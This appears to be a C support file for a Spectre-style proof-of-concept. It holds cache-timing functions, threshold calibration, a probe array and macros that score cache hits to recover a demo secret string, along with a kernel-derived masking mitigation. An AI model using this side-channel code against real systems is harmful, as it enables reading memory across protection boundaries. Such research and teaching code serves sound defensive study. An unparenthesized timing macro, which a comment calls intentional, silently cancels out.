201 lines
4.8 KiB
C
201 lines
4.8 KiB
C
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <stdint.h>
|
|
#include <getopt.h>
|
|
#include <string.h>
|
|
#include <x86intrin.h>
|
|
|
|
/*
 * Only 32-bit and 64-bit x86 targets are accepted; any other architecture
 * stops the build here. The cache line size is taken to be 64 bytes.
 */
#if !defined(__i386__) && !defined(__amd64__)
#error "unsupported architecture"
#endif

#define CACHELINE_SIZE 64
|
|
|
|
/*
 * Feature selection.
 *
 * When the compiler targets SSE without SSE2, the rdtscp, mfence and clflush
 * code paths are all disabled. Each macro is guarded so that a value already
 * supplied on the command line (e.g. -DNORDTSCP) is not redefined.
 */
#if defined(__SSE__) && !defined(__SSE2__)
#ifndef NORDTSCP
#define NORDTSCP
#endif
#ifndef NOMFENCE
#define NOMFENCE
#endif
#ifndef NOCLFLUSH
#define NOCLFLUSH
#endif
#endif

/*
 * LATENCY: constant used by the timing code, chosen by timer flavour.
 *   rdtscp available -> 42 + 42
 *   rdtsc only       -> 18 + 18 (with or without mfence)
 *
 * It is now defined for every combination of NORDTSCP / NOMFENCE, including
 * both being set by hand on an SSE2 build, which previously left LATENCY
 * undefined.
 *
 * NOTE(review): the expansion is intentionally left unparenthesized. An
 * expression such as `t1 - t0 - LATENCY` therefore parses as
 * `t1 - t0 - 42 + 42`. Existing code in this file is written against that
 * expansion, so adding parentheses here would change measured values.
 */
#ifndef NORDTSCP
#define LATENCY 42 + 42
#else
#define LATENCY 18 + 18
#endif
|
|
|
|
#ifdef MASKING_MITIGATION
|
|
/*
 * Taken from the Linux kernel:
 * https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
 *
 * array_index_mask_nospec() - build a mask that is ~0UL when the bounds
 *                             check succeeds and 0 otherwise
 * @index: array element index
 * @size:  number of elements in the array
 *
 * Returns:
 *     0 - (index < size)
 */
static inline unsigned long
array_index_mask_nospec(unsigned long index, unsigned long size)
{
    unsigned long in_bounds_mask;

    /*
     * cmp leaves the carry flag set exactly when index < size (unsigned);
     * sbb of a register with itself then produces 0 - carry.
     */
    __asm__ __volatile__ (
        "cmp %[limit],%[idx]; sbb %[out],%[out];"
        : [out] "=r" (in_bounds_mask)
        : [limit] "g" (size), [idx] "r" (index)
        : "cc");

    return in_bounds_mask;
}
|
|
#endif //MASKING_MITIGATION
|
|
|
|
#ifdef NOCLFLUSH
|
|
/*
 * Dimensions of the buffer below: CACHE_FLUSH_ITERATIONS chunks of
 * CACHE_FLUSH_STRIDE bytes each (2048 * 4096 bytes = 8 MiB).
 * Only compiled when NOCLFLUSH is defined.
 */
#define CACHE_FLUSH_STRIDE     4096
#define CACHE_FLUSH_ITERATIONS 2048

uint8_t cache_flush_array[CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE];
|
|
|
|
/*
 * Flush memory using long SSE instructions.
 *
 * Writes zeros over the 256 bytes starting at addr (sixteen 16-byte
 * streaming stores).
 *
 * addr must be 16-byte aligned, as _mm_stream_ps requires, and must point
 * to at least 256 writable bytes.
 */
void
flush_memory_sse(uint8_t * addr)
{
    float *p = (float *)addr;
    const __m128 zero = _mm_setzero_ps();
    int k, l;

    /* Non-sequential memory addressing by looping through k by l */
    for (k = 0; k < 4; k++) {
        for (l = 0; l < 4; l++) {
            _mm_stream_ps(&p[(l * 4 + k) * 4], zero);
        }
    }
}
|
|
#endif //NOCLFLUSH
|
|
|
|
/* Distance in bytes between consecutive per-value slots of channel[]. */
#define GAP 512

/* The phrase the side channel is meant to extract. */
char *secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";

/* Timing cut-off for a cache hit; can be set with the -t option. */
unsigned int cache_hit_threshold;
/* Number of initialised entries at the start of array1. */
unsigned int array1_size = 16;

uint8_t unused1[64];
uint8_t unused2[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };

uint8_t channel[256 * GAP]; // side channel to extract secret phrase
|
|
|
|
/*
 * __OCTOPUS_ARGS__ - command-line parsing, expanded inside a function that
 * returns int.
 *
 * Names the expansion expects in the enclosing scope:
 *   argc, argv  - the program arguments
 *   o           - int receiving each getopt() result
 *   json        - counter incremented once per -j
 *
 * Options:
 *   -t INT  stores atoi(INT) in cache_hit_threshold
 *   -j      increments json
 *
 * On an unknown option, or when non-option arguments remain, the usage text
 * is printed to stderr and the enclosing function returns 1.
 *
 * The loop ends when getopt() returns -1, the end-of-options value that
 * POSIX specifies (EOF is not guaranteed to be that value).
 *
 * NOTE(review): atoi() performs no validation, so non-numeric input yields
 * 0 and a negative value wraps when stored in the unsigned threshold.
 */
#define __OCTOPUS_ARGS__\
    while ((o = getopt(argc, argv, "t:j")) != -1) {\
        switch (o) {\
        case 't':\
            cache_hit_threshold = atoi(optarg);\
            break;\
        case 'j':\
            json++;\
            break;\
        default:\
        usage:\
            fprintf(stderr, "usage: %s [-j] "\
                "[-t threshold]\n"\
                "\t-j\t\tJSON output\n"\
                "\t-t INT\t\tfixed threshold\n", argv[0]);\
            return 1;\
        }\
    }\
    if (argc != optind) {\
        goto usage;\
    }
|
|
|
|
/*
 * __OCTOPUS_TIMINGS__ - probe all 256 slots of channel[] and score hits.
 *
 * Must be expanded inside a loop: the final `break` leaves that loop once
 * the best candidate has scored at least 3.
 *
 * Names the expansion expects in the enclosing scope:
 *   i, j, mix_i - integer scratch variables (j ends as the best index)
 *   addr        - pointer used for each timed read
 *   tries       - current attempt counter
 *   results     - per-value score table with at least 256 entries
 */
#define __OCTOPUS_TIMINGS__\
    /* Time reads. Order is lightly mixed up to prevent stride prediction */\
    for (i = 0; i < 256; i++) {\
        mix_i = (13 + (i * 167)) & 255;\
        addr = channel + (mix_i * GAP);\
        if (timed_access(addr) > cache_hit_threshold) {\
            continue; /* too slow: not a cache hit */\
        }\
        if (mix_i == array1[tries % array1_size]) {\
            continue; /* skip the value selected by array1[tries % array1_size] */\
        }\
        results[mix_i]++; /* cache hit - add +1 to score for this value */\
    }\
    /* Locate highest results in j; on ties the highest index wins */\
    j = -1;\
    for (i = 0; i < 256; i++) {\
        if (j >= 0 && results[i] < results[j]) {\
            continue;\
        }\
        j = i;\
    }\
    if (results[j] >= 3) {\
        break;\
    }
|
|
|
|
/*
 * __OCTOPUS_NOCLFLUSH_INIT__ - declare the locals `l` and `junk2` in the
 * enclosing scope. junk2 starts at 0 and is referenced once through a void
 * cast so it does not trigger an unused-variable warning.
 */
#define __OCTOPUS_NOCLFLUSH_INIT__\
    int l;\
    int junk2 = 0;\
    (void)junk2;
|
|
|
|
/*
 * __OCTOPUS_MFENCE__ - expands to an `_mm_mfence();` statement, or to
 * nothing when NOMFENCE is defined.
 *
 * Preprocessor directives are not recognised inside a macro replacement
 * list, so the conditional has to select between two definitions instead
 * of living inside a single one.
 */
#ifndef NOMFENCE
#define __OCTOPUS_MFENCE__ _mm_mfence();
#else
#define __OCTOPUS_MFENCE__
#endif
|
|
|
|
static inline unsigned
|
|
timed_access(volatile uint8_t *addr)
|
|
{
|
|
uint64_t t0, t1;
|
|
#pragma GCC diagnostic ignored "-Wuninitialized"
|
|
unsigned int junk = junk;
|
|
#ifndef NORDTSCP
|
|
t0 = __rdtscp(& junk);
|
|
junk |= *addr;
|
|
t1 = __rdtscp(& junk);
|
|
#else
|
|
#ifndef NOMFENCE
|
|
/*
|
|
Since the rdstc instruction isn't serialized, newer processors will try to
|
|
reorder it, ruining its value as a timing mechanism.
|
|
To get around this, we use the mfence instruction to introduce a memory
|
|
barrier and force serialization. mfence is used because it is portable across
|
|
Intel and AMD.
|
|
*/
|
|
_mm_mfence();
|
|
t0 = __rdtsc();
|
|
_mm_mfence();
|
|
junk = *addr;
|
|
_mm_mfence();
|
|
t1 = __rdtsc();
|
|
_mm_mfence();
|
|
#else
|
|
/*
|
|
The mfence instruction was introduced with the SSE2 instruction set, so
|
|
we have to ifdef it out on pre-SSE2 processors.
|
|
Luckily, these older processors don't seem to reorder the rdtsc instruction,
|
|
so not having mfence on older processors is less of an issue.
|
|
*/
|
|
t0 = __rdtsc();
|
|
junk |= *addr;
|
|
t1 = __rdtsc();
|
|
#endif // NOMFENCE
|
|
#endif // NORDTSCP
|
|
return (unsigned)(t1 - t0 - LATENCY);
|
|
}
|
|
|
|
static void
|
|
calibrate_threshold(unsigned int *threshold)
|
|
{
|
|
volatile char buf[2 * CACHELINE_SIZE];
|
|
volatile uint8_t* bufp;
|
|
int i;
|
|
const int cnt = 10000;
|
|
uint64_t tcache = 0;
|
|
__attribute__((unused))
|
|
volatile int junk = 0;
|
|
|
|
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));
|
|
|
|
junk |= *bufp;
|
|
|
|
for (i = 0, tcache = 0; i < cnt; i++) {
|
|
tcache += timed_access(bufp);
|
|
}
|
|
tcache = tcache / cnt;
|
|
|
|
if (threshold != NULL) {
|
|
*threshold = tcache + LATENCY;
|
|
}
|
|
return;
|
|
}
|
|
|
|
|